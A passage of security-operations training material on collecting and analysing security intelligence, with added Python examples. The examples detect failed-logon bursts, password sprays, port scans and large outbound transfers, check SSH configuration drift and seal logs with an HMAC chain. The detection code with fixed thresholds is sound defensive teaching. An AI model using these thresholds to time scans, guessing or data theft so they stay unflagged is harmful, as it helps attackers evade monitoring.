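                           "src": src, "outcome": "failure" if event_id == "4625" else "success"})
    return events

def find_guessing_bursts(events, threshold=4, window=timedelta(minutes=2)):
    """Analysis: per (source address, host), report `threshold` or more failed logons
    inside `window`; a success from the same address within one more window after
    the burst is escalated, because the guessing may have worked."""
    by_key = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_key[(ev["src"], ev["host"])].append(ev)
    findings = []
    for (src, host), evs in by_key.items():
        failures = [e for e in evs if e["outcome"] == "failure"]
        for start in range(len(failures)):
            burst = [e for e in failures[start:] if e["ts"] - failures[start]["ts"] <= window]
            if len(burst) < threshold:
                continue
            end = burst[-1]["ts"]
            success_after = any(e["outcome"] == "success" and end <= e["ts"] <= end + window
                                for e in evs)
            findings.append({"src": src, "host": host, "failures": len(burst),
                             "users": sorted({e["user"] for e in burst}),
                             "first": burst[0]["ts"], "last": end,
                             "success_after": success_after,
                             "severity": "high" if success_after else "medium"})
            break  # one finding per address/host pair is enough for the report
    return findings

def action_items(findings):
    """Production: turn findings into the action items the report carries."""
    items = []
    for f in findings:
        text = (f"[{f['severity'].upper()}] {f['failures']} failed logons on {f['host']} from "
                f"{f['src']} ({f['first']:%H:%M:%S} to {f['last']:%H:%M:%S}) targeting "
                + ", ".join(f["users"]))
        if f["success_after"]:
            text += "; a later logon from that address succeeded: reset the credential and review the session"
        else:
            text += "; check the lockout policy and consider blocking the source address"
        items.append(text)
    return items

def run_pipeline():
    """Dissemination: the findings and action items are what goes to those who can act."""
    events = parse_linux_auth(LINUX_AUTH_LOG) + parse_windows_logon(WINDOWS_LOGON_CSV)
    findings = find_guessing_bursts(events)
    return findings, action_items(findings)
```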

Security Intelligence Collection Plan

The first step in planning for security intelligence collection is to determine what sort of intelligence you want to obtain. Then identify hardware and software sources for collecting and monitoring appropriate data, and verify that these sources will indeed provide you with all the information you need.
There is a wide variety of potential data sources, some of which you may already capture, such as certain operating system information and application logs. In other cases, you may need to enable additional logging or tracking capabilities in advance to ensure you have the data you need. Some sources are not based on logs but require alternative methods of investigation, such as network topology and architecture information. You also need to consider the tools you're using to obtain this information, as some tools may be more suited to certain parts of the network; for example, a Server Message Block (SMB) mapping tool would be most effective in areas where network file sharing is common or likely to take place.
Because the collection of some data—which may be critical for producing good intelligence—requires advance planning and preparation, it is important to perform the planning step carefully and think through your intelligence requirements in advance. In a large organization, this should be conducted as a unified effort across departments and functional groups to ensure the right data is being collected.

Continuous Security Monitoring (CSM)


The most prominent process that supports intelligence collection is continuous security monitoring (CSM). Rather than collection being an ad hoc process, CSM is an ongoing effort to obtain information vital in managing risk within the organization. CSM ensures all key assets and risk areas are under constant surveillance by finely tuned systems that can detect a wide variety of issues. Whether it's network traffic, internal and external communications, host maintenance, or business operations, a CSM architecture carefully tracks the many components that make up the organization. Essentially, continuous monitoring can turn a reactive collection process into a proactive one, enabling the organization to obtain security intelligence that is comprehensive, accurate, up to date, and actionable.
Although the effective implementation and maintenance of a CSM capability is complex and time consuming, the result is that systems are continually monitored for problems or potential problems, and a response can often be crafted as soon as a problem is detected, minimizing or preventing damage.
The United States and other governments are not only requiring that government and military agencies adopt a program of CSM, but they are also encouraging civilian agencies to do the same. The U.S. Department of Homeland Security created a program named Continuous Diagnostics and Mitigation (CDM), which provides U.S. government agencies and departments with capabilities and tools to "identify cybersecurity risks on an ongoing basis, prioritize these risks based upon potential impacts, and enable cybersecurity personnel to mitigate the most significant problems first."

What to Monitor
Security monitoring systems, including those that implement CSM, monitor a variety of items.

Item to Monitor | Description and Rationale for Monitoring

Vulnerabilities, configurations, and assets
A system may be vulnerable due to its configuration settings, buggy versions of software or device
drivers, missing patches or updates, incorrect policy settings, inappropriate access controls, and so
forth. By collecting state information from your various systems and comparing it to acceptable
baselines, you can determine if the systems are in a vulnerable state.
Unfortunately, changes to configuration can happen at any time, and these changes may mean your
systems are no longer secure. A user can change settings or share files or directories on a computer.
An administrator can inadvertently make the wrong change to a setting or policy. A required patch or
update may not be installed on a particular system, or it may be inadvertently removed through a
rollback, hardware replacement, or some other configuration change. Because such changes can
happen at any time, you should implement continuous monitoring of critical storage locations and
system configurations to reveal a potential weakness or vulnerability as soon as it occurs.

System and network logs
Traditional security monitoring often focused on system and network logs, which still provide a
large volume of useful security data. An effective system should be able to collect, consolidate, and
normalize data from a variety of different logs and data sources, and transmit this information to a
secure database where it can be analyzed. Various events should trigger the collection of state data,
such as system reboots, file modifications, or the creation of new user accounts. Network logs should
provide data on an ongoing basis.
Some individual points of data may be insignificant by themselves, but may indicate a problem when
combined with other data or when viewed as a trend. So the monitoring system should continually
aggregate and correlate data and analyze it all in the larger context.

Security device logs
Intrusion detection systems (IDSs) are devices or software applications that monitor networks and
applications to detect suspicious traffic patterns, activities, or policy violations that might indicate an
attack. IDSs may be considered an early form of CSM, and can be incorporated into more
comprehensive systems.

Threat intelligence
Threat intelligence sources help to focus security monitoring by providing information on new threats
and current threat trends. Sources of this information include free online registries and catalogs,
commercial registries and monitoring services, and product vendors. Increasingly, these sources are
providing threat intelligence data in standard formats that are easily processed by automated
monitoring systems.
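The first row of the table says to collect state from your systems and compare it with acceptable baselines. The following is an added example of that comparison for one kind of state, an OpenSSH server configuration; it is not code from the CFR course. The directive names are real sshd_config keywords and the first-value-wins rule is how sshd reads the file, but the baseline values, the hostnames, and the two configuration snapshots are constructed for illustration.

```python
"""Configuration drift check against an approved baseline.

Added example, not from the CFR course. Compares collected sshd_config state
with an assumed organizational baseline, treating an absent directive as the
sshd default rather than as "compliant by omission".
"""

# Assumed organizational baseline: directive -> required value.
BASELINE = {
    "PermitRootLogin": "no",
    "PasswordAuthentication": "no",
    "X11Forwarding": "no",
    "LogLevel": "VERBOSE",
    "MaxAuthTries": "3",
}

# What sshd uses when a directive is absent. A deleted line is still a setting,
# and for PasswordAuthentication the default is the insecure value.
SSHD_DEFAULTS = {
    "PermitRootLogin": "prohibit-password",
    "PasswordAuthentication": "yes",
    "X11Forwarding": "no",
    "LogLevel": "INFO",
    "MaxAuthTries": "6",
}

# Constructed snapshots as collected from two hosts.
COMPLIANT_HOST = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
X11Forwarding no
LogLevel VERBOSE
MaxAuthTries 3
"""

DRIFTED_HOST = """\
# Root login re-enabled "temporarily"; the PasswordAuthentication line was deleted.
Port 22
PermitRootLogin yes
LogLevel VERBOSE
LogLevel INFO   # ignored by sshd: the first value for a keyword wins
X11Forwarding no
MaxAuthTries 3
"""


def parse_sshd_config(text):
    """Effective global directives, keyed by lowercased keyword.

    Comments and blank lines are skipped, the first occurrence of a keyword
    wins (as in sshd), and parsing stops at the first Match block because the
    directives below it are conditional (a simplification: conditional
    settings are not evaluated here).
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        keyword, value = parts[0].lower(), parts[1].strip()
        if keyword == "match":
            break
        settings.setdefault(keyword, value)
    return settings


def check_drift(config_text, baseline=BASELINE, defaults=SSHD_DEFAULTS):
    """Return [(directive, expected, actual)] for every baseline directive not met.

    Absent directives are compared using the sshd default, and the finding
    says so, because "nobody set it" and "somebody set it wrong" call for
    different fixes.
    """
    effective = parse_sshd_config(config_text)
    findings = []
    for directive, expected in baseline.items():
        key = directive.lower()
        if key in effective:
            actual_value, note = effective[key], ""
        else:
            actual_value, note = defaults.get(directive, ""), " (default, directive absent)"
        if actual_value.lower() != expected.lower():
            findings.append((directive, expected, actual_value + note))
    return findings


if __name__ == "__main__":
    for name, snapshot in (("compliant", COMPLIANT_HOST), ("drifted", DRIFTED_HOST)):
        print(name, check_drift(snapshot))
```

Run the same check on every collected snapshot and on every configuration change event, and the "drifted" finding above is exactly the kind of vulnerable state the row describes: a setting that was correct at deployment and quietly stopped being so.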

Security Monitoring Tools
There are several general tool types that can assist you in your security monitoring efforts, including:
• SIEM, which collects and correlates log events and alerts from devices and applications and
raises its own alerts in real time or near real time.
• Security Content Automation Protocol (SCAP), a suite of open standards (including CVE, CCE,
CPE, OVAL, XCCDF, and CVSS) for expressing and automatically checking security configurations
and known flaws.
• Network behavior anomaly detection (NBAD), which establishes a baseline of normal network
traffic and flags deviations from that baseline. Unlike signature-based detection, it does not depend
on a known pattern for a specific attack.
Before selecting a tool type, you should make sure it fits the following criteria:
• It should collect information from numerous sources.
• It should be able to interoperate with other systems, such as a help desk or change
management program.
• It should comply with all relevant laws and industry regulations.
• It should offer scalable reporting so you get both a high-level and low-level perspective on your
security.
NetFlow
NetFlow is a protocol included in many enterprise-level routers and switches that enables network
administrators to monitor the flow of information across a network. NetFlow has gone through
several updates since Cisco created it in the mid-1990s (the IETF later standardized the version 9
record format as IPFIX), but the most recent versions provide the following useful information about
packets that traverse NetFlow-enabled devices:
• The networking protocol interface used (the input and output interfaces).
• The version and type of IP used.
• The source and destination IP addresses.
• The source and destination User Datagram Protocol (UDP)/Transmission Control Protocol
(TCP) port.
• The IP's type of service (ToS) used.
• The number of packets and bytes in the flow, and when the flow started and ended.
NetFlow records describe flows, not payloads: they tell you who talked to whom, over which ports,
and how much, but not what was said. Many devices also export sampled flows, so packet and byte
counts should be read as estimates.
You can use a variety of NetFlow monitoring tools to capture data for point-in-time analysis and to
diagnose any security or operational issues the network is experiencing. You can also integrate
NetFlow into tools like a SIEM to improve your monitoring capabilities.
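The two checks below show what flow metadata is good for in practice. They are an added example, not code from the CFR course or from any NetFlow collector vendor: the records are read from a simple CSV layout of the kind a collector or SIEM parser would emit, and the column names, thresholds, addresses, and the sample export itself are constructed.

```python
"""Fan-out and outbound-volume checks over NetFlow-style flow records.

Added example, not from the CFR course. Flow data records who talked to whom,
on which ports, and how much, so it answers two questions well: is one source
touching many distinct destination/port pairs (scanning), and is an internal
host pushing an unusually large volume to one external peer?
"""
import csv
import io
import ipaddress
from collections import defaultdict

# Constructed sample export. Columns mirror core NetFlow v5 fields: flow start,
# source/destination address and port, IP protocol number, packet and byte counts.
_HEADER = "start,src,dst,sport,dport,proto,pkts,bytes"
_ROWS = [
    # Ordinary HTTPS from a workstation.
    "2024-03-01T09:00:01Z,10.0.5.17,203.0.113.9,51000,443,6,40,9800",
    "2024-03-01T09:00:02Z,10.0.5.17,203.0.113.9,51001,443,6,42,10100",
    # 1.4 GB from a file server to one external address in a single flow.
    "2024-03-01T09:00:10Z,10.0.5.23,198.51.100.77,52000,443,6,900000,1400000000",
    # Internal DNS, small and normal.
    "2024-03-01T09:00:11Z,10.0.5.23,10.0.0.53,53210,53,17,1,78",
] + [
    # One external source probing 25 ports on one internal host, one packet each.
    f"2024-03-01T09:01:{i:02d}Z,192.0.2.44,10.0.5.17,{40000 + i},{20 + i},6,1,60"
    for i in range(25)
]
SAMPLE_FLOWS = "\n".join([_HEADER] + _ROWS) + "\n"


def parse_flows(text):
    """Parse the CSV export into dicts with numeric counters."""
    flows = []
    for row in csv.DictReader(io.StringIO(text)):
        flows.append({
            "start": row["start"],
            "src": row["src"],
            "dst": row["dst"],
            "sport": int(row["sport"]),
            "dport": int(row["dport"]),
            "proto": int(row["proto"]),
            "pkts": int(row["pkts"]),
            "bytes": int(row["bytes"]),
        })
    return flows


def fan_out(flows, min_targets=20):
    """Sources that reached at least min_targets distinct (dst, dport) pairs.

    A single one-packet flow is noise; the count of distinct targets per source
    is what separates a scan from normal client behaviour.
    """
    targets = defaultdict(set)
    for f in flows:
        targets[f["src"]].add((f["dst"], f["dport"]))
    return {src: len(t) for src, t in targets.items() if len(t) >= min_targets}


def outbound_volume(flows, internal_net, min_bytes=1_000_000_000):
    """(internal src, external dst) pairs whose summed bytes reach min_bytes.

    Only internal-to-external flows count, so a backup to an internal server
    does not trip the check. Sampled NetFlow understates these totals.
    """
    net = ipaddress.ip_network(internal_net)
    total = defaultdict(int)
    for f in flows:
        src, dst = ipaddress.ip_address(f["src"]), ipaddress.ip_address(f["dst"])
        if src in net and dst not in net:
            total[(f["src"], f["dst"])] += f["bytes"]
    return {pair: b for pair, b in total.items() if b >= min_bytes}


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    print("scanners:", fan_out(flows))
    print("bulk outbound:", outbound_volume(flows, "10.0.0.0/8"))
```

Both thresholds are starting points to be tuned against your own traffic; the point is that neither check needs packet contents, which is why flow data remains useful even where most traffic is encrypted.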

Data Collection
In general, the more data you collect, the more likely you will have the data you need. But you can't
monitor everything. Some data might not be helpful, and may, in fact, just add to your effort
without creating much value. Once you have the data, you must process it into a form that will
quickly reveal the information you need. You must strike a balance with security intelligence
collection between having enough information to get the job done and having so much information
that you make the task more difficult and expensive than it needs to be. Many sources for security
intelligence are available, such as those in the following figure.

Figure 7-2: Potential sources of security intelligence.

Ensure all the data you collect—including original logs and any files, databases, or systems in which
you aggregate that data—is protected by multiple layers of security. Also, make sure you do not
violate any privacy and compliance requirements by copying or storing restricted information.

Information Processing
Security data comes from a wide variety of sources. In its raw form, some of that data may not be
particularly useful for analysis. To produce actionable intelligence, patterns or anomalies must be
identified within the data that point toward a particular problem or vulnerability. The analysis
process may involve scanning by human eyes, pattern recognition by automation tools, or some
combination of both. Whether data is being scanned by humans or software, the data may need to
be reformatted or restructured to facilitate the scanning and analysis process.
There are many different formats for logs, such as proprietary binary formats, tab-separated or
comma-separated values (CSV), databases, syslog, Simple Network Management Protocol (SNMP)
traps, and XML. Some formats may be directly readable through a simple text editor, while others
are not. There may be simple encoding differences, such as whether Linux®-style or Windows®-style
end-of-line characters are used, or whether text is ANSI or Unicode. Another processing challenge is
the timestamps used in each log. Hosts might use incorrect internal clock settings, or settings that
are correct for a different time zone, and many formats record local time without saying which zone
it is in. These can vary widely from one log to another, making it difficult to reconstruct time
sequences. Synchronizing every host to a trusted time source and logging timestamps with an
explicit UTC offset removes most of this ambiguity before the data ever reaches the analyst.

Log Enrichment
Log enrichment attempts to address some of the challenges of processing information by
enhancing the readability and usefulness of logs. Data in logs from different types of hosts can be
normalized to present information in a standard layout that will be easier for an analyst or analysis
software to read and compare. Data from different sources can be aggregated into a single form or
view to provide a clearer picture of the context and timing of events that occurred in different parts
of the system.


For example, an analyst might need to compare logs where information is recorded in different time
zones. If the time zones could be normalized into a single, primary zone, then it would save the
analyst a great deal of time and effort attempting to cross-reference the different timings for each
entry. Likewise, normalization techniques can ensure the consistency of field names. For instance,
you might have two logs, one that records an "event type" and one that records an "event ID." An
analyst might be confused and assume these two attributes are different, but if they actually describe
the same basic thing, you can normalize the field name to eliminate that confusion. Another
enrichment tactic is to resolve IP addresses in logs to known network hostnames to make it easier
for the analyst to identify what host the entry is referring to. Keep the original, unmodified record
alongside the enriched copy: the normalized view is for analysis, but the raw record is what you will
need as evidence.
Because of the sheer number and volume of logs, it is most efficient to use automation tools to
quickly format and combine logs with different content, formats, and timestamps. The security
practitioner may develop some of these tools from scratch, or may use a commercial or open source
tool, which may include log viewers, formatters, and conversion tools; visualization tools that
present event data in a graphical format; or features provided by host-based intrusion detection
system (HIDS) products or security information and event management (SIEM) software.
tr
Log Auditing
Log auditing is the process of evaluating an organization's logging architecture to determine if it is
meeting a set of predefined criteria. Log auditing is an important part of the intelligence collection
and analysis process, as it enables the organization to validate whether or not its logs are providing
value to the business, integrating with the overall risk management framework, and complying with
any applicable laws or regulations.
Auditing is typically a distinct discipline from the analyst or incident responder role, and is often
fulfilled by an external party. This ensures there is no conflict of interest, and that the evaluation is
more likely to be objective and free of bias (whether intentional or not). There are many techniques
that go into log auditing, and a truly in-depth discussion could fill an entire course.
Here are just a few examples of log auditing techniques:
• Source validation: In many organizations, logs are aggregated and sent over the network to an
appliance for further correlation and analysis. However, it's still important that a particular log
can be traced back to its source for non-repudiation purposes. The system that created the log
should not be disassociated from that log, or its timeline may be compromised and its contents
unusable. An auditor might validate the source of a log through the use of digital signatures,
where a certificate binds the signing key to the originating system.
• Integrity verification: Like validating the source of a log, an auditor should be able to accurately
verify a log has not been tampered with. Attackers attempt to erase or falsify log data to cover
their tracks and confuse security professionals. Auditors can verify log integrity through digital
signatures or message authentication codes (MACs) computed over the log records. Either
mechanism only proves something if the signing or MAC key is kept away from the system being
audited: a tag computed by a host the attacker controls can simply be recomputed by the attacker.
In practice this means forwarding records to a collector that applies the signature or MAC on
receipt, or writing to an append-only remote log store.
• Evidence collection: In order for an auditor to present a compelling case for whether or not a
logging architecture is in compliance, they need to be able to extract useful evidence from the
logs. This evidence will influence the auditor's assertions and recommendations. The type of
evidence collected will vary greatly depending on the criteria being audited, but in general, the
auditor will be looking for events that indicate system misconfiguration, least-privilege violations,
improper or obsolete cryptographic implementations, poor error handling, and more.
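The integrity-verification technique above, as an added example that is not code from the CFR course or from any product. Each record's tag is an HMAC-SHA256 over the previous tag plus the record, so altering, deleting, or reordering a record breaks every tag after it, and a final tag over the whole export catches truncation, which per-record tags alone cannot. The key is assumed to live on the collector that seals the records, not on the host that produced them; the log lines and the key are constructed.

```python
"""Tamper-evident log export with a keyed hash chain.

Added example, not from the CFR course. seal() is what a collector would do on
receipt; first_bad_index() and verify_export() are what an auditor runs later
with the same key.
"""
import hashlib
import hmac

GENESIS = b"\x00" * 32  # fixed starting value for the chain

# Constructed log lines as the collector received them.
LOG_LINES = [
    "2024-03-01T09:02:10Z web01 sshd: Failed password for admin from 203.0.113.9",
    "2024-03-01T09:02:14Z web01 sshd: Failed password for admin from 203.0.113.9",
    "2024-03-01T09:02:19Z web01 sshd: Accepted password for admin from 203.0.113.9",
    "2024-03-01T09:02:30Z web01 sudo: admin : COMMAND=/usr/bin/less /var/log/auth.log",
]
# Constructed key. In practice it is generated and held on the collector,
# never on the log source, so a compromised source cannot forge tags.
KEY = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c2b7e151628aed2a6abf7158809cf4f3c")


def _tag(key, prev, line):
    """HMAC over the previous tag and this line; chaining is what links records."""
    return hmac.new(key, prev + line.encode("utf-8"), hashlib.sha256).digest()


def seal(lines, key):
    """Return ([(line, tag_hex), ...], final_tag_hex)."""
    prev, sealed = GENESIS, []
    for line in lines:
        tag = _tag(key, prev, line)
        sealed.append((line, tag.hex()))
        prev = tag
    return sealed, prev.hex()


def first_bad_index(sealed, key):
    """Index of the first line whose tag fails to verify, or -1 if the chain is intact."""
    prev = GENESIS
    for i, (line, tag_hex) in enumerate(sealed):
        expected = _tag(key, prev, line)
        if not hmac.compare_digest(expected, bytes.fromhex(tag_hex)):
            return i
        prev = expected
    return -1


def verify_export(sealed, final_tag_hex, key):
    """True only if every tag verifies and the last one matches the recorded final tag.

    The final-tag comparison is what detects an attacker who simply drops the
    last lines: each remaining tag would still verify on its own.
    """
    if first_bad_index(sealed, key) != -1:
        return False
    last = sealed[-1][1] if sealed else GENESIS.hex()
    return hmac.compare_digest(last, final_tag_hex)


if __name__ == "__main__":
    sealed, final = seal(LOG_LINES, KEY)
    print("intact:", verify_export(sealed, final, KEY))
    edited = list(sealed)
    edited[2] = (edited[2][0].replace("Accepted", "Failed"), edited[2][1])
    print("first bad line after edit:", first_bad_index(edited, KEY))
    print("truncated export accepted:", verify_export(sealed[:-1], final, KEY))
```

The final tag must be stored somewhere the attacker cannot rewrite along with the log (for example, recorded by the collector in a separate store or published to a second system); otherwise truncation followed by recomputing the final tag goes unnoticed.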

Publicly Available Information
There is a wide variety of publicly available sources of security intelligence. The following table lists
some of the major ones.

Public Sources of Security Intelligence | Description

Free registries
Free public registries, sponsored by organizations such as the U.S. Department of Homeland
Security and the MITRE Corporation, provide public access to a collection of known threats, which
are updated as soon as they are made public.
Examples include:
• Open Vulnerability and Assessment Language (OVAL) repositories provide a forum for
participants to store and discuss a range of security content encoded in various standard XML
formats to represent system information, such as vulnerabilities, configuration management, patch
management, and policy compliance. OVAL® is international in scope, with content hosted by CIS,
MITRE, NIST, Cisco, various Linux vendors, and other organizations, and is funded by the U.S.
Department of Homeland Security.
Website: oval.mitre.org
• Common Weakness Enumeration (CWE™), sponsored by MITRE, provides a catalog of
software weakness types, the root-cause categories behind vulnerabilities, as distinct from the
Common Vulnerabilities and Exposures (CVE) list, which identifies individual vulnerabilities in
specific products. Its goal is reducing security-related software flaws and creating automated tools
to identify, correct, and prevent such flaws.
Website: cwe.mitre.org
• The United States Computer Emergency Readiness Team (US-CERT) provides four products
in the National Cyber Awareness System, which offer a variety of information for users with varied
technical expertise. Current Activity provides recent information about high-impact security
activity. Alerts provide timely information about current security issues, vulnerabilities, and
exploits. Bulletins provide weekly summaries. Analysis Reports provide in-depth analysis on new
and evolving threats.
Website: https://www.us-cert.gov/ncas
• Common Attack Pattern Enumeration and Classification (CAPEC™) provides a free public
database of common attack patterns.
Website: https://capec.mitre.org

Commercial registries and monitoring services
Some organizations provide security intelligence as a commercial service offering. Some primarily
repackage information coming from free public registries, while others provide data that may not be
found in the free public registries. For example, Recorded Future claims its Intelligence Graph is
able to analyze dynamic data from billions of entities all over the world.

Security blogs and social media
Intended more for human readers rather than computers, sources such as blogs, discussion forums,
and groups geared toward information security provide insights and reporting on the latest trends in
software vulnerabilities and cybersecurity issues.
Examples include:
• Schneier on Security: https://www.schneier.com
• Krebs on Security: https://krebsonsecurity.com
• Dark Reading: https://www.darkreading.com
• Threatpost: https://threatpost.com
• Fortinet blog: https://www.fortinet.com/blog
• Naked Security: https://nakedsecurity.sophos.com
• Security Boulevard: https://securityboulevard.com
• Securosis blog: https://securosis.com/blog

Security mailing lists, newsgroups, and newsfeeds
You can subscribe to mailing lists to receive instant or digest updates on vulnerabilities and trends.
Some lists are geared more toward attackers than security specialists, but the information from these
lists can tip you off to potential problems.
Examples include:
• National Cyber Security Centre (NCSC) reports: https://www.ncsc.gov.uk/index/report
• Usenet newsgroups such as alt.security, comp.risks, comp.security.announce, and comp.virus
• Internet Storm Center Handlers Diary: https://isc.sans.edu

Announcements by product vendors
Major software vendors provide announcements of known security issues in their products. Many
enable you to subscribe to announcements through Rich Site Summary (RSS) newsfeeds, mailing
lists, and so forth.
Examples include:
• Microsoft Security Response Center: https://www.microsoft.com/en-us/msrc
• Apple security announcements: https://lists.apple.com/mailman/listinfo/security-announce and
available as a newsfeed at https://lists.apple.com/rss/security-announce.rss
• Cisco: https://tools.cisco.com/security/center/rss.x?i=44
• Debian: https://www.debian.org/security

Security Information Standards
Because security intelligence originates from many different sources and it can be difficult to
analyze, various initiatives are underway to provide that information in standard formats that can be
read by computers as well as humans. Many of these standards are associated with various registries
that provide security information.
Examples include:
• OVAL
• Malware Attribute Enumeration and Characterization (MAEC™)
• Structured Threat Information Expression (STIX™), which describes the intelligence itself
• Trusted Automated Exchange of Indicator Information (TAXII™), the protocol used to exchange
STIX content between parties
• Common Weakness Scoring System (CWSS™)
• Common Weakness Risk Analysis Framework (CWRAF™)
• Policy Language for Assessment Results Reporting (PLARR)
• OpenIOC framework
• CAPEC
• The Incident Object Description Exchange Format (IODEF), RFC 5070, since superseded by
IODEF version 2 in RFC 7970

Collection and Reporting Automation
Collecting cybersecurity intelligence has traditionally involved assembling a loose collection of tools
and information sources, such as system logs, NBAD, risk and compliance management, and
network forensics. With the processing capabilities of current cloud computing and big data
analytics tools, processing the large variety and quantity of data needed to provide instant
identification and reporting of security concerns is not only possible, but is also available as a
commercial product through the latest generation of security information and event management
(SIEM). SIEMs are available as software applications, network appliances, or managed cloud-based
solutions.
Whereas early SIEMs required extensive manual configurations and were not much more
sophisticated than a homemade solution, recent products are quite helpful in automating the task of
data collection and reporting. They also provide an extensive library of connectors to automate data
collection from various sources, analytics tools optimized for security intelligence, reporting
templates, and so forth. SIEMs not only automate data collection, but they are very useful in
correlating data collected from different sources.

Note: SIEMs will be discussed more extensively in a later lesson.

Data Retention
To meet various compliance and regulatory requirements, organizations may be legally bound to
retain certain types of data for a specified period. On the other hand, some requirements may
prevent you from retaining certain types of data.
It is not practical for individual administrators to read and interpret every regulation or policy
affecting your organization, so staff knowledgeable in these matters should define specific company
policies for each type of data—such as firewall logs, intrusion detection logs, system logs,
application logs, and so forth—and provide them to staff to ensure compliance. Policies should also
include guidelines on when and how to dispose of various types of data, and how to preserve
original copies of log files, if necessary. Organizations should also have policies to deal with the
inadvertent disclosure of sensitive information.
What is meant by "data retention" varies by industry, and there are many organizations such as the
National Institute of Standards and Technology (NIST) that provide guides to help organizations
define appropriate retention periods. There are also industry-specific groups such as EDRM that
provide a more specialized service. It is important to include legal counsel in your organization's
data retention policies, as not meeting requirements can bring about unwanted liability.

Analysis Methods
An important part of building a data collection and analysis platform is employing a variety of
monitoring and analysis methods. One method may be more effective than another in certain
circumstances, so selecting a comprehensive toolset that incorporates several of these methods is
usually the best approach.
• Trend analysis is the process of detecting patterns within a data set over time, and using those
patterns to make predictions about future events. Applied to security intelligence, trend analysis
can help you to judge that specific events over time are likely related, and possibly indicate that
an attack is imminent. It can also help you avoid unforeseen negative effects that result from an
attack if you can't stop the attack altogether. Aside from predicting future events, trend analysis
also enables you to review past events through a new lens. For example, when an incident
happens, you'll usually attribute it to one cause. However, after time has passed and you gather
more intelligence, you may gain a new perspective and realize the nature of the cause is different
than you had originally thought.
• Correlation analysis is the process of identifying dependent relationships between different
forms of information that indicate some larger pattern of behavior. Correlation analysis is able to
identify activity that may not be observable when considering information in isolation; only when
that information is put in context with other information can a clearer picture of events emerge.
For example, a failed login attempt by a single account may not mean much, but if you correlate
that login attempt with a source IP address that has made many failed login attempts across
multiple accounts recently, you'll have a better understanding of what's happening.
• Anomaly analysis is the process of defining an expected outcome or pattern to events, and then
identifying any events that do not follow these patterns. This is useful in tools and environments
that enable you to set rules, like an IDS: if network traffic or host-based events fail to conform
to the rules, then the system will see this as an anomalous event. Anomaly analysis is useful
because you don't need to rely on known malicious signatures to identify something unwanted in
your organization; relying on signatures alone produces false negatives for anything the signature
author did not anticipate. The trade-off is false positives, since legitimate but unusual activity
also breaks the rules.
• Behavioral analysis is the process of identifying the way in which an entity acts, and then
reviewing future behavior to see if it deviates from the norm. Behavioral analysis differs from
anomaly analysis in where the baseline comes from: in anomaly analysis, you define the expected
pattern up front; in behavioral analysis, the system learns the expected pattern from the observed
history of the entity being monitored. For example, a banking system may track the average
dollar value of withdrawals a customer makes; if the latest withdrawal far exceeds the average,
the system may conclude the account was hijacked and freeze the customer's account.
• Heuristic analysis is the process of identifying the way in which an entity acts in a specific
environment, and making decisions about the nature of the entity based on this. Rather than
focusing only on the potentially unwanted entity, heuristic systems will consider how that entity
may negatively impact its surrounding context. Using various metrics, the heuristic system may
conclude that a particular entity is or is not a threat to the environment, and react accordingly.
For example, some anti-malware solutions will run software on the host operating system in a
sandbox environment to determine the effect it has on the system. If it identifies negative effects,
it may classify the software as malicious.

Note: Because monitoring is a key component of these methods, they are also referred to as
"anomaly monitoring," "behavioral monitoring," etc.
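Two of the methods above, run end to end over constructed data, as an added example that is not code from the CFR course or from any product. Correlation analysis finds a source address whose individually harmless failed logins span many accounts in a short window (a password spray, the failed-login scenario described under Correlation analysis) and then checks whether that source later succeeded; behavioral analysis learns each customer's own withdrawal baseline from history, as in the banking scenario, and flags only the customer whose latest withdrawal is far outside it. The event records, thresholds, account names, and amounts are all constructed.

```python
"""Correlation and behavioral analysis over constructed event data.

Added example, not from the CFR course. correlate_spray() and
spray_then_success() implement the correlation case; behavioral_outliers()
implements the learned-baseline case.
"""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed normalized authentication events: (UTC time, account, source IP, outcome).
AUTH_EVENTS = [
    ("2024-03-01T09:00:00Z", "alice", "203.0.113.9", "fail"),
    ("2024-03-01T09:00:04Z", "bob", "203.0.113.9", "fail"),
    ("2024-03-01T09:00:09Z", "carol", "203.0.113.9", "fail"),
    ("2024-03-01T09:00:13Z", "dave", "203.0.113.9", "fail"),
    ("2024-03-01T09:00:18Z", "erin", "203.0.113.9", "fail"),
    ("2024-03-01T09:00:22Z", "frank", "203.0.113.9", "success"),
    ("2024-03-01T09:05:00Z", "alice", "10.0.5.17", "fail"),     # a mistyped password,
    ("2024-03-01T09:05:30Z", "alice", "10.0.5.17", "success"),  # then a normal login
]

# Constructed withdrawal history per customer, oldest first, latest last.
WITHDRAWALS = {
    "cust-1001": [40, 60, 50, 45, 55, 50, 60, 40, 900],
    "cust-1002": [500, 300, 800, 650, 400, 900, 350, 750, 900],
}


def _parse_ts(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def correlate_spray(events, min_users=5, window=timedelta(minutes=10)):
    """Sources whose failures hit at least min_users distinct accounts within window.

    Each failure on its own looks like a user mistyping a password; only when
    the failures from one source are viewed together does the spray stand out.
    Returns {src_ip: sorted list of targeted accounts}.
    """
    failures = defaultdict(list)
    for ts, user, src, outcome in events:
        if outcome == "fail":
            failures[src].append((_parse_ts(ts), user))
    flagged = {}
    for src, fails in failures.items():
        fails.sort()
        for i, (t0, _) in enumerate(fails):
            users = {u for t, u in fails[i:] if t - t0 <= window}
            if len(users) >= min_users:
                flagged[src] = sorted(users)
                break
    return flagged


def spray_then_success(events, flagged):
    """Successful logins from a flagged source: the accounts most worth investigating first."""
    return [(src, user, ts) for ts, user, src, outcome in events
            if outcome == "success" and src in flagged]


def behavioral_outliers(history, min_history=8, z=3.0):
    """Customers whose latest value lies more than z standard deviations above
    the mean of their own earlier values.

    The baseline is learned per entity rather than set globally, so the same
    900 is an outlier for one customer and routine for another.
    Returns {customer: z-score rounded to one decimal}.
    """
    out = {}
    for cust, values in history.items():
        past, latest = values[:-1], values[-1]
        if len(past) < min_history:
            continue  # not enough history to trust a baseline
        mean, sd = statistics.fmean(past), statistics.pstdev(past)
        if sd == 0:
            continue  # every past value identical; a z-score is undefined
        score = (latest - mean) / sd
        if score > z:
            out[cust] = round(score, 1)
    return out


if __name__ == "__main__":
    sprays = correlate_spray(AUTH_EVENTS)
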